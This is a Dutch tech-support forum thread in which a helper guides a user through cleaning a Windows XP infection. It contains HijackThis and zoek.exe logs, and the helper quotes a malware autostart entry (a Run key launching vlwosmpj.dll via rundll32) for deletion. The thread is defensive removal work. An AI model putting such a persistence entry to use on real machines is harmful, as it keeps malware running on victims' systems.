          O22 - SharedTaskScheduler: Cache-daemon voor onderdeelcategorieën - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
          O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
          O23 - Service: Adobe Version Cue CS2 - Adobe Systems Incorporated - C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
          O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
          O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
          O23 - Service: Norman eLogger service 6 (eLoggerSvc6) - Norman ASA - C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
          O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
          O23 - Service: iPod-service (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
          O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
          O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
          O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
          O23 - Service: Norman NJeeves - Unknown owner - C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
          O23 - Service: Norman ZANDA - Norman ASA - C:\Program Files\Norman\Npm\Bin\Zanda.exe
          O23 - Service: Norman Virus Control on-access component (nvcoas) - Norman ASA - C:\Program Files\Norman\Nvc\bin\nvcoas.exe
          O23 - Service: Norman Virus Control Scheduler (NVCScheduler) - Norman ASA - C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
          O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
          O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
          O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe

          --
          End of file - 13024 bytes

          Is alles nu schoon?

          Comment


          • #6
            Het ziet er al wel veel beter uit

            Probeer met Hijackthis deze regel te verwijderen:
            O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s

            Probeer ook deze bestanden te verwijderen indien deze nog aanwezig zijn:
            C:\WINDOWS\system32\vlwosmpj.dll
            C:\WINDOWS\BMbbad6e67.xml
            C:\WINDOWS\BMbbad6e67.txt

            Kan je ze niet verwijderen, probeer het dan eens in veilige modus.

            Download dit bestand: zoek.exe
            Dubbelklik het, na een tijdje opent er een logje.
            Post de inhoud van dit logje in je volgende bericht

            Comment


            • #7
              - Regel verwijderd met HiJackThis
              - Zoek.exe geopend, zie log hieronder.

              ----a-w 0 2008-03-23 17:28:48 C:\WINDOWS\0.log
              ----a-w 0 2008-03-23 17:51:39 C:\WINDOWS\BMbbad6e67.txt
              --s-a-w 2,048 2008-03-23 17:28:41 C:\WINDOWS\bootstat.dat
              ----a-w 685,056 2008-03-23 16:28:12 C:\WINDOWS\isRS-000.tmp
              ----a-w 2,547 2008-03-23 12:57:50 C:\WINDOWS\KB912812.log
              ----a-w 42,906 2008-03-23 13:37:21 C:\WINDOWS\KB944533-IE7.log
              ----a-w 157,242 2008-03-23 13:18:19 C:\WINDOWS\ntbtlog.txt
              ----a-w 22 2008-03-23 17:29:09 C:\WINDOWS\pskt.ini
              ---ha-w 54,156 2008-03-23 17:29:17 C:\WINDOWS\QTFont.qfn
              ----a-w 29,394 2008-03-23 14:28:38 C:\WINDOWS\SchedLgU.Txt
              ----a-w 659,258 2008-03-17 17:13:23 C:\WINDOWS\setupapi.log
              ----a-w 227 2008-03-23 14:33:40 C:\WINDOWS\system.ini
              ----a-w 2,548 2008-03-23 12:32:29 C:\WINDOWS\unins000.dat
              ----a-w 691,545 2008-03-23 12:31:16 C:\WINDOWS\unins000.exe
              ----a-w 159 2008-03-23 17:28:49 C:\WINDOWS\wiadebug.log
              ----a-w 49 2008-03-23 17:28:49 C:\WINDOWS\wiaservc.log
              ----a-w 718 2008-03-23 14:33:40 C:\WINDOWS\win.ini
              ----a-w 1,711,998 2008-03-23 17:30:03 C:\WINDOWS\WindowsUpdate.log
              ----a-w 3,328 2008-03-12 02:01:47 C:\WINDOWS\Debug\mrt.log
              ----a-w 2,328 2008-03-12 02:01:47 C:\WINDOWS\Debug\mrteng.log
              ----a-w 0 2008-03-23 17:28:41 C:\WINDOWS\Debug\PASSWD.LOG
              -c--a-w 22,014 2008-03-23 13:37:21 C:\WINDOWS\ie7updates\KB944533-IE7\spuninst\spuninst.inf
              ----a-r 11,813,888 2008-03-17 11:48:50 C:\WINDOWS\Installer\2a6ae555.msp
              ----a-w 289,792 2008-03-15 01:05:49 C:\WINDOWS\Installer\b50bfe7.msi
              ----a-w 172,032 2008-03-15 01:04:29 C:\WINDOWS\Installer\MSI21F.tmp
              ----a-w 172,032 2008-03-15 01:04:38 C:\WINDOWS\Installer\MSI224.tmp
              ----a-r 7 2008-03-12 02:02:19 C:\WINDOWS\Installer\$PatchCache$\Managed\9040110900063D11C8EF10054038389C\CacheSize.txt
              ----a-r 172,032 2008-03-15 01:05:49 C:\WINDOWS\Installer\{3248F0A8-6813-11D6-A77B-00B0D0160050}\sp1033.MST
              ----a-r 593,920 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe
              ----a-r 12,288 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\cagicon.exe
              ----a-r 766 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\graph.ico
              ----a-r 86,016 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\inficon.exe
              ----a-r 135,168 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\misc.exe
              ----a-r 11,264 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\mspicons.exe
              ----a-r 27,136 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\oisicon.exe
              ----a-r 4,096 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\opwicon.exe
              ----a-r 794,624 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\outicon.exe
              ----a-r 249,856 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe
              ----a-r 61,440 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pubs.exe
              ----a-r 23,040 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\unbndico.exe
              ----a-r 286,720 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe
              ----a-r 409,600 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe
              ----a-w 320 2008-03-23 11:37:58 C:\WINDOWS\pchealth\helpctr\Config\NewsSet.xml
              ----a-w 149,896 2008-03-23 11:38:36 C:\WINDOWS\pchealth\helpctr\Config\Cache\Personal_32_1043.dat.bak
              ----a-w 264 2008-03-23 11:38:00 C:\WINDOWS\pchealth\helpctr\Config\News\NewsHeadlines_1043_Personal.xml
              ----a-w 70,714 2008-03-23 11:37:58 C:\WINDOWS\pchealth\helpctr\Config\News\newsver.xml
              ----a-w 2,038 2008-03-20 23:56:35 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1017.xml
              ----a-w 2,038 2008-03-22 00:00:58 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1047.xml
              ----a-w 2,106 2008-03-22 00:00:59 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1057.xml
              ----a-w 44,850 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1066.xml
              ----a-w 1,456 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1068.xml
              ----a-w 40,410 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1070.xml
              ----a-w 3,610 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1072.xml
              ----a-w 17,810 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1074.xml
              ----a-w 1,898 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1076.xml
              ----a-w 2,038 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1077.xml
              ----a-w 1,580 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1078.xml
              ----a-w 29,446 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1080.xml
              ----a-w 2,042 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1082.xml
              ----a-w 569,128 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1084.xml
              ----a-w 210,340 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1086.xml
              ----a-w 2,100 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1087.xml
              ----a-w 97,202 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1088.xml
              ----a-w 6,296 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1090.xml
              ----a-w 93,842 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1092.xml
              ----a-w 8,205,252 2008-03-23 00:17:16 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1094.xml
              ----a-w 2,038 2008-03-10 14:25:46 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_747.xml
              ----a-w 15,454 2008-03-10 14:25:47 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_757.xml
              ----a-w 2,924 2008-03-10 14:25:53 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_765.xml
              ----a-w 2,038 2008-03-12 21:30:10 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_777.xml
              ----a-w 3,806 2008-03-12 21:30:11 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_791.xml
              ----a-w 2,038 2008-03-13 21:34:32 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_807.xml
              ----a-w 2,100 2008-03-13 21:34:33 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_817.xml
              ----a-w 2,038 2008-03-14 22:08:43 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_837.xml
              ----a-w 2,106 2008-03-14 22:08:44 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_847.xml
              ----a-w 2,038 2008-03-15 23:21:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_867.xml
              ----a-w 1,912 2008-03-15 23:21:16 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_883.xml
              ----a-w 11,990 2008-03-15 23:21:22 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_885.xml
              ----a-w 2,038 2008-03-16 23:34:24 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_897.xml
              ----a-w 2,100 2008-03-16 23:34:25 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_907.xml
              ----a-w 2,038 2008-03-17 23:38:47 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_927.xml
              ----a-w 2,106 2008-03-17 23:38:47 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_937.xml
              ----a-w 2,038 2008-03-18 23:47:47 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_957.xml
              ----a-w 2,100 2008-03-18 23:47:48 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_967.xml
              ----a-w 2,038 2008-03-19 23:52:11 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_987.xml
              ----a-w 27,996 2008-03-23 00:17:22 C:\WINDOWS\pchealth\helpctr\DataColl\history_db.xml
              ----a-w 12,650 2008-03-23 11:43:38 C:\WINDOWS\Prefetch\17PHOLMES2000352.EXE-2C677BBF.pf
              ----a-w 86,768 2008-03-21 13:27:26 C:\WINDOWS\Prefetch\ACROBAT.EXE-02932E19.pf
              ----a-w 47,818 2008-03-22 20:45:05 C:\WINDOWS\Prefetch\ACROBATINFO.EXE-0372BF03.pf
              ----a-w 50,966 2008-03-23 13:38:28 C:\WINDOWS\Prefetch\ADOBELMSVC.EXE-0589E292.pf
              ----a-w 65,218 2008-03-23 13:38:30 C:\WINDOWS\Prefetch\ADOBELM_CLEANUP.0001-1438DE4B.pf
              ----a-w 76,228 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\ASWS.EXE-3850FD86.pf
              ----a-w 16,532 2008-03-13 18:03:51 C:\WINDOWS\Prefetch\CALC.EXE-02CD573A.pf
              ----a-w 10,888 2008-03-20 10:24:25 C:\WINDOWS\Prefetch\CCLAW.EXE-25318A5F.pf
              ----a-w 94,496 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\CLI.EXE-2A5BE79C.pf
              ----a-w 15,194 2008-03-23 11:43:31 C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
              ----a-w 43,344 2008-03-15 21:48:49 C:\WINDOWS\Prefetch\CSTART.EXE-1EDA82DF.pf
              ----a-w 127,530 2008-03-22 00:16:00 C:\WINDOWS\Prefetch\DEFRAG.EXE-273F131E.pf
              ----a-w 75,884 2008-03-22 00:16:00 C:\WINDOWS\Prefetch\DFRGNTFS.EXE-269967DF.pf
              ----a-w 20,790 2008-03-21 06:46:05 C:\WINDOWS\Prefetch\DLLHOST.EXE-205D880D.pf
              ----a-w 54,260 2008-03-15 10:26:08 C:\WINDOWS\Prefetch\DRWTSN32.EXE-2B4B52AC.pf
              ----a-w 60,084 2008-03-17 17:13:42 C:\WINDOWS\Prefetch\DUMPREP.EXE-1B46F901.pf
              ----a-w 23,356 2008-03-15 00:49:07 C:\WINDOWS\Prefetch\DW20.EXE-22C39A55.pf
              ----a-w 28,412 2008-03-17 17:13:46 C:\WINDOWS\Prefetch\DWWIN.EXE-30875ADC.pf
              ----a-w 25,870 2008-03-15 21:48:27 C:\WINDOWS\Prefetch\EVEREST POKER.EXE-33F19199.pf
              ----a-w 66,306 2008-03-18 19:27:33 C:\WINDOWS\Prefetch\EXCEL.EXE-13B3F319.pf
              ----a-w 97,996 2008-03-23 12:48:57 C:\WINDOWS\Prefetch\EXPLORER.EXE-082F38A9.pf
              ----a-w 82,042 2008-03-15 12:16:04 C:\WINDOWS\Prefetch\FIREFOX.EXE-09ED6DBB.pf
              ----a-w 89,022 2008-03-23 12:50:13 C:\WINDOWS\Prefetch\FIREFOX.EXE-28641590.pf
              ----a-w 53,052 2008-03-15 10:26:13 C:\WINDOWS\Prefetch\GINSTALL.EXE-2C0C79BC.pf
              ----a-w 10,112 2008-03-20 10:24:49 C:\WINDOWS\Prefetch\GINSTALL.EXE-39D65A2C.pf
              ----a-w 72,802 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\GOOGLEUPDATER.EXE-2CAF5929.pf
              ----a-w 58,462 2008-03-23 11:38:04 C:\WINDOWS\Prefetch\HELPCTR.EXE-3862B6F5.pf
              ----a-w 36,342 2008-03-23 11:38:07 C:\WINDOWS\Prefetch\HELPHOST.EXE-247D2792.pf
              ----a-w 233,808 2008-03-23 11:38:06 C:\WINDOWS\Prefetch\HELPSVC.EXE-2878DDA2.pf
              ----a-w 57,226 2008-03-23 12:53:14 C:\WINDOWS\Prefetch\HITMANPRO2.EXE-002E39B0.pf
              ----a-w 119,146 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\IEXPLORE.EXE-27122324.pf
              ----a-w 18,300 2008-03-23 11:36:57 C:\WINDOWS\Prefetch\IMAPI.EXE-0BF740A4.pf
              ----a-w 12,086 2008-03-23 11:43:16 C:\WINDOWS\Prefetch\INSTALL.EXE-30B9C453.pf
              ----a-w 8,580 2008-03-15 01:06:00 C:\WINDOWS\Prefetch\JAVA.EXE-04FA6B41.pf
              ----a-w 12,106 2008-03-15 00:07:42 C:\WINDOWS\Prefetch\JAVA.EXE-0539FACC.pf
              ----a-w 37,710 2008-03-15 01:06:16 C:\WINDOWS\Prefetch\JAVAW.EXE-03C5992A.pf
              ----a-w 30,788 2008-03-15 01:04:33 C:\WINDOWS\Prefetch\JRE-6U5-WINDOWS-I586-P-IFTW_1-1DAB5218.pf
              ----a-w 36,744 2008-03-15 00:07:52 C:\WINDOWS\Prefetch\JUCHECK.EXE-17305A81.pf
              ----a-w 12,830 2008-03-23 11:43:05 C:\WINDOWS\Prefetch\KEYGEN.EXE-1D236EC6.pf
              ----a-w 5,952 2008-03-15 01:05:59 C:\WINDOWS\Prefetch\LAUNCHER.EXE-060FE09B.pf
              ----a-w 622,882 2008-03-23 03:44:59 C:\WINDOWS\Prefetch\Layout.ini
              ----a-w 18,694 2008-03-21 00:50:53 C:\WINDOWS\Prefetch\MPAS-D.EXE-2F969366.pf
              ----a-w 38,604 2008-03-23 13:44:35 C:\WINDOWS\Prefetch\MPCMDRUN.EXE-1F9D1CA1.pf
              ----a-w 14,964 2008-03-19 00:50:31 C:\WINDOWS\Prefetch\MPSIGSTUB.EXE-08653309.pf
              ----a-w 15,434 2008-03-21 00:50:53 C:\WINDOWS\Prefetch\MPSIGSTUB.EXE-0C7CF8B3.pf
              ----a-w 14,980 2008-03-13 21:16:49 C:\WINDOWS\Prefetch\MPSIGSTUB.EXE-1A64C729.pf
              ----a-w 89,192 2008-03-21 02:01:45 C:\WINDOWS\Prefetch\MSIEXEC.EXE-2F8A8CAE.pf
              ----a-w 9,742 2008-03-21 02:01:45 C:\WINDOWS\Prefetch\MSOHTMED.EXE-1BD4AAD2.pf
              ----a-w 87,354 2008-03-14 13:30:31 C:\WINDOWS\Prefetch\MSVS.EXE-129B5DE4.pf
              ----a-w 49,278 2008-03-23 11:38:33 C:\WINDOWS\Prefetch\NERO.EXE-39268565.pf
              ----a-w 37,948 2008-03-23 11:43:04 C:\WINDOWS\Prefetch\NERO_8.2.8.0_SERIAL.TXT.EXE-281E0A02.pf
              ----a-w 10,884 2008-03-20 10:24:49 C:\WINDOWS\Prefetch\NIP.EXE-228A4FF5.pf
              ----a-w 23,968 2008-03-23 10:24:16 C:\WINDOWS\Prefetch\NIU.EXE-041D58EE.pf
              ----a-w 66,912 2008-03-23 14:21:00 C:\WINDOWS\Prefetch\NOTEPAD.EXE-336351A9.pf
              ----a-w 8,348 2008-03-20 10:24:49 C:\WINDOWS\Prefetch\NSE.EXE-248A9306.pf
              ----a-w 1,590,946 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\NTOSBOOT-B00DFAAD.pf
              ----a-w 11,182 2008-03-20 10:24:32 C:\WINDOWS\Prefetch\NVCOA.EXE-34A6640C.pf
              ----a-w 14,134 2008-03-20 10:24:56 C:\WINDOWS\Prefetch\NVCOAS.EXE-275A764F.pf
              ----a-w 13,100 2008-03-20 10:24:42 C:\WINDOWS\Prefetch\NVCSCHED.EXE-2CCE897E.pf
              ----a-w 87,286 2008-03-18 22:53:08 C:\WINDOWS\Prefetch\OMNIPAGE.EXE-0C9EF492.pf
              ----a-w 12,278 2008-03-18 22:53:08 C:\WINDOWS\Prefetch\OPA11.EXE-0A9E3482.pf
              ----a-w 6,584 2008-03-21 02:01:43 C:\WINDOWS\Prefetch\OSE.EXE-108AC98F.pf
              ----a-w 10,640 2008-03-23 12:53:45 C:\WINDOWS\Prefetch\PACRYPT.EXE-2B5988BA.pf
              ----a-w 45,200 2008-03-15 01:06:01 C:\WINDOWS\Prefetch\PATCHJRE.EXE-1834E785.pf
              ----a-w 77,586 2008-03-23 13:42:20 C:\WINDOWS\Prefetch\PHOTOSHOP.EXE-0234D846.pf
              ----a-w 18,378 2008-03-17 18:48:35 C:\WINDOWS\Prefetch\PING.EXE-31216D26.pf
              ----a-w 12,088 2008-03-13 17:56:32 C:\WINDOWS\Prefetch\QTTASK.EXE-342507FB.pf
              ----a-w 34,666 2008-03-17 21:56:03 C:\WINDOWS\Prefetch\RUNDLL32.EXE-12D6D1AE.pf
              ----a-w 21,248 2008-03-17 13:41:59 C:\WINDOWS\Prefetch\RUNDLL32.EXE-12E27DD0.pf
              ----a-w 35,338 2008-03-21 13:42:30 C:\WINDOWS\Prefetch\RUNDLL32.EXE-173B6BF9.pf
              ----a-w 31,010 2008-03-14 11:57:23 C:\WINDOWS\Prefetch\RUNDLL32.EXE-17A7DE0F.pf
              ----a-w 25,764 2008-03-23 11:47:35 C:\WINDOWS\Prefetch\RUNDLL32.EXE-1993CD82.pf
              ----a-w 18,254 2008-03-14 12:08:23 C:\WINDOWS\Prefetch\RUNDLL32.EXE-19DA8F15.pf
              ----a-w 24,686 2008-03-23 13:42:20 C:\WINDOWS\Prefetch\RUNDLL32.EXE-1A0CEA1E.pf
              ----a-w 61,704 2008-03-18 12:05:38 C:\WINDOWS\Prefetch\RUNDLL32.EXE-1A8ABFA3.pf
              ----a-w 18,254 2008-03-14 12:08:34 C:\WINDOWS\Prefetch\RUNDLL32.EXE-1C7DEA22.pf
              ----a-w 26,944 2008-03-15 22:37:36 C:\WINDOWS\Prefetch\RUNDLL32.EXE-21A91014.pf
              ----a-w 20,130 2008-03-23 11:50:29 C:\WINDOWS\Prefetch\RUNDLL32.EXE-21AE48C6.pf
              ----a-w 17,362 2008-03-23 11:49:17 C:\WINDOWS\Prefetch\RUNDLL32.EXE-264D4AF9.pf
              ----a-w 18,310 2008-03-18 13:18:36 C:\WINDOWS\Prefetch\RUNDLL32.EXE-268BFF96.pf
              ----a-w 26,864 2008-03-14 12:09:52 C:\WINDOWS\Prefetch\RUNDLL32.EXE-27004236.pf
              ----a-w 74,810 2008-03-17 17:35:02 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2850295C.pf
              ----a-w 18,254 2008-03-23 11:47:46 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2C449C4E.pf
              ----a-w 63,354 2008-03-17 17:32:10 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2C91BA85.pf
              ----a-w 20,288 2008-03-23 11:50:20 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2C98EDDD.pf
              ----a-w 29,846 2008-03-14 13:30:45 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2E5B29AB.pf
              ----a-w 23,172 2008-03-23 11:51:54 C:\WINDOWS\Prefetch\RUNDLL32.EXE-302705EF.pf
              ----a-w 18,352 2008-03-23 11:47:39 C:\WINDOWS\Prefetch\RUNDLL32.EXE-307B577E.pf
              ----a-w 18,254 2008-03-23 11:48:48 C:\WINDOWS\Prefetch\RUNDLL32.EXE-3B11AB06.pf
              ----a-w 22,204 2008-03-23 11:51:29 C:\WINDOWS\Prefetch\RUNDLL32.EXE-3D949BE9.pf
              ----a-w 18,760 2008-03-18 22:53:09 C:\WINDOWS\Prefetch\RUNDLL32.EXE-3F1C419C.pf
              ----a-w 27,478 2008-03-21 13:33:33 C:\WINDOWS\Prefetch\RUNDLL32.EXE-3F9377ED.pf
              ----a-w 27,106 2008-03-14 12:08:26 C:\WINDOWS\Prefetch\RUNDLL32.EXE-404209AA.pf
              ----a-w 40,564 2008-03-17 17:32:07 C:\WINDOWS\Prefetch\RUNDLL32.EXE-40F34A69.pf
              ----a-w 26,040 2008-03-15 12:39:39 C:\WINDOWS\Prefetch\RUNDLL32.EXE-4177EBC0.pf
              ----a-w 25,056 2008-03-13 17:10:30 C:\WINDOWS\Prefetch\RUNDLL32.EXE-41870121.pf
              ----a-w 38,346 2008-03-17 17:32:05 C:\WINDOWS\Prefetch\RUNDLL32.EXE-42BAC0DB.pf
              ----a-w 18,706 2008-03-23 11:36:51 C:\WINDOWS\Prefetch\RUNDLL32.EXE-451FC2C0.pf
              ----a-w 23,048 2008-03-23 12:38:11 C:\WINDOWS\Prefetch\RUNDLL32.EXE-454B012A.pf
              ----a-w 24,886 2008-03-13 17:10:52 C:\WINDOWS\Prefetch\RUNDLL32.EXE-45B7B3C3.pf
              ----a-w 18,254 2008-03-13 17:41:34 C:\WINDOWS\Prefetch\RUNDLL32.EXE-47F7862F.pf
              ----a-w 32,834 2008-03-14 11:06:03 C:\WINDOWS\Prefetch\RUNDLL32.EXE-4CDAA44E.pf
              ----a-w 22,216 2008-03-23 12:31:26 C:\WINDOWS\Prefetch\SBSD152UPD.EXE-095A0D85.pf
              ----a-w 27,746 2008-03-23 12:31:27 C:\WINDOWS\Prefetch\SBSD152UPD.TMP-24DA4806.pf
              ----a-w 61,774 2008-03-23 11:40:47 C:\WINDOWS\Prefetch\SETUPX.EXE-378D7205.pf
              ----a-w 61,460 2008-03-21 06:46:10 C:\WINDOWS\Prefetch\SOFTWAREUPDATE.EXE-1415D1B8.pf
              ----a-w 93,822 2008-03-23 12:54:11 C:\WINDOWS\Prefetch\SPYBOTSD.EXE-1344276B.pf
              ----a-w 66,264 2008-03-23 12:54:17 C:\WINDOWS\Prefetch\SPYSWEEPERUI.EXE-360592DC.pf
              ----a-w 32,866 2008-03-23 12:47:03 C:\WINDOWS\Prefetch\TASKMGR.EXE-20256C55.pf
              ----a-w 97,560 2008-03-23 12:27:52 C:\WINDOWS\Prefetch\THUNDERBIRD.EXE-38CA75D9.pf
              ----a-w 104,240 2008-03-12 20:22:45 C:\WINDOWS\Prefetch\THUNDE~1.EXE-360E0082.pf
              ----a-w 52,020 2008-03-15 01:05:59 C:\WINDOWS\Prefetch\UNPACK200.EXE-215A2047.pf
              ----a-w 20,364 2008-03-23 12:31:16 C:\WINDOWS\Prefetch\UPDATE.EXE-131667C7.pf
              ----a-w 29,468 2008-03-23 11:41:46 C:\WINDOWS\Prefetch\UTORRENT.EXE-3888D1B0.pf
              ----a-w 24,414 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf
              ----a-w 23,002 2008-03-18 22:53:10 C:\WINDOWS\Prefetch\WIAACMGR.EXE-212ED878.pf
              ----a-w 63,262 2008-03-23 12:42:18 C:\WINDOWS\Prefetch\WINAMP.EXE-0D0189CA.pf
              ----a-w 21,322 2008-03-15 20:16:32 C:\WINDOWS\Prefetch\WINAMP552_LITE_NL-NL[1].EXE-245BB9F2.pf
              ----a-w 23,308 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\WINAMPA.EXE-0536E33F.pf
              ----a-w 63,628 2008-03-17 18:47:53 C:\WINDOWS\Prefetch\WINRAR.EXE-39C6DAD9.pf
              ----a-w 116,878 2008-03-18 22:57:13 C:\WINDOWS\Prefetch\WINWORD.EXE-37F6AE09.pf
              ----a-w 94,472 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\WLLOGINPROXY.EXE-1781D844.pf
              ----a-w 27,186 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\WMIAPSRV.EXE-1E2270A5.pf
              ----a-w 35,338 2008-03-23 13:44:42 C:\WINDOWS\Prefetch\WMIPRVSE.EXE-28F301A9.pf
              ----a-w 14,594 2008-03-19 10:24:22 C:\WINDOWS\Prefetch\WSCNTFY.EXE-1B24F5EB.pf
              ----a-w 76,952 2008-03-23 13:35:02 C:\WINDOWS\Prefetch\WSFTPGUI.EXE-08424FB7.pf
              ----a-w 27,594 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\WUAUCLT.EXE-399A8E72.pf
              ----a-w 60,418 2008-03-18 22:53:18 C:\WINDOWS\Prefetch\XOCR32B.EXE-07889382.pf
              ----a-w 110,524 2008-03-15 01:05:59 C:\WINDOWS\Prefetch\ZIPPER.EXE-1A280C86.pf
              ----a-w 26,910 2008-03-23 12:27:44 C:\WINDOWS\Prefetch\~CJQTJKJ.EXE-20A57D3F.pf
              ----a-w 479,766 2008-03-23 13:37:27 C:\WINDOWS\SoftwareDistribution\ReportingEvents.log
              ----a-w 45,096,960 2008-03-23 17:34:51 C:\WINDOWS\SoftwareDistribution\DataStore\DataStore.edb
              ----a-w 8,192 2008-03-23 17:34:51 C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.chk
              ----a-w 131,072 2008-03-23 17:34:51 C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log
              ----a-w 131,072 2008-03-21 09:31:49 C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb00232.log
              ----a-w 4 2008-03-23 12:43:19 C:\WINDOWS\SoftwareDistribution\Download\1641df03ac29cd5eb68d7361219d0d81\_downloadprogress_.state
              ----a-w 34 2008-03-23 12:44:29 C:\WINDOWS\SoftwareDistribution\Download\1641df03ac29cd5eb68d7361219d0d81\_unpacked_.state
              ----a-w 34 2008-03-23 12:44:44 C:\WINDOWS\SoftwareDistribution\Download\1641df03ac29cd5eb68d7361219d0d81\_usedelta_.state
